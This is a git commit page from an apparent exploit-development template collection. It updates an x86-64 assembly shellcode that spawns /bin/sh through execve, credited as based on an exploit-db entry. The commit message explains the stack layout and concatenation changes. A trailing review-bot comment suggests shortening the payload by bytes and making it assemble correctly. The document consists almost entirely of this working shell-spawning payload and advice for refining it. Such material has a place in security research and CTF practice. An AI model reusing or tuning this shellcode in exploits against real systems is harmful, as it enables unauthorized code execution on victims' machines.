author | Malfurious <m@lfurio.us> | 2023-01-15 08:06:42 -0500 |
---|---|---|
committer | Malfurious <m@lfurio.us> | 2023-01-15 10:12:48 -0500 |
commit | f21e743212f02dbfb560fa74d983a7e156722d11 (patch) | |
tree | 920fc58ea7ec7896f8f4cf9ed48595785375b526 /templates/shellcode/examples/shell64.asm | |
parent | ad106276e2935085f9201ffa65423032f8fcff6b (diff) | |
shellcode: Update /bin/sh shellcodes
The shell-spawning shellcodes are rewritten to address the following
concerns:
- The array parameters to execve are now set properly, to valid
arrays on the stack, instead of NULL pointers.
- The cdq instruction is no longer used to zero rdx (it sign-extends
  eax into edx, not rax into rdx; cqo is the 64-bit form), since it
  has not been producing the expected results in gdb.
- Labels, sections, and other file metadata are removed in order to
support concatenation of shellcode samples to make more complex
code.
Signed-off-by: Malfurious <m@lfurio.us>
Diffstat (limited to 'templates/shellcode/examples/shell64.asm')
-rw-r--r-- | templates/shellcode/examples/shell64.asm | 36 |
1 files changed, 22 insertions, 14 deletions
diff --git a/templates/shellcode/examples/shell64.asm b/templates/shellcode/examples/shell64.asm
index 2353b6f..3812c33 100644
--- a/templates/shellcode/examples/shell64.asm
+++ b/templates/shellcode/examples/shell64.asm
@@ -1,16 +1,24 @@
-[SECTION .text]
-global _start
+; Originally based on https://www.exploit-db.com/shellcodes/47008
 
-; https://www.exploit-db.com/shellcodes/47008
+; stack layout
+;
+; ┏━━━━━━━━━━━━━━┓
+; ┃ v
+; [ argv0, NULL ] "/bin//sh" NULL
+; ^ ^ ^
+; ┃ ┃ ┃
+; argv envp filename
 
-_start:
- xor rsi, rsi
- xor rdx, rdx
- push rsi
- mov rdi, 0x68732f2f6e69622f
- push rdi
- push rsp
- pop rdi
- mov al, 0x3b
- cdq
- syscall
+; execve("/bin/sh", ["/bin/sh"], [])
+xor rax, rax
+xor rsi, rsi
+mov rdi, 0x68732f2f6e69622f
+push rsi
+push rdi
+mov rdi, rsp
+push rsi
+mov rdx, rsp
+push rdi
+mov rsi, rsp
+mov al, 59
+syscall |
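Review bot: `xor rax, rax` and `xor rsi, rsi` at the top of the new block each carry a REX.W prefix that the 32-bit forms do not need — `xor eax, eax` / `xor esi, esi` zero the full 64-bit register as well (a 32-bit write zero-extends) and are one byte shorter each, which counts in a payload measured in bytes; the three `mov rXX, rsp` lines cannot use the same trick since they need the whole pointer. The `mov al, 59` near the end silently depends on rax having been cleared at the top (the old version's `cdq` trouble came from exactly that missing clear before `mov al, 0x3b`), so a comment there, `mov al, 59 ; SYS_execve — only correct because rax was zeroed above`, would stop a later concatenation from breaking it. With `[SECTION .text]` and `global _start` removed, nothing in the file states the operand size any more; if these samples are assembled with `nasm -f bin`, which defaults to 16-bit mode, a `BITS 64` line at the top would be needed, and it is harmless to repeat when files are concatenated. The argv/envp construction itself (NULL shared as argv's terminator and envp's only element) reads correctly against the pushes.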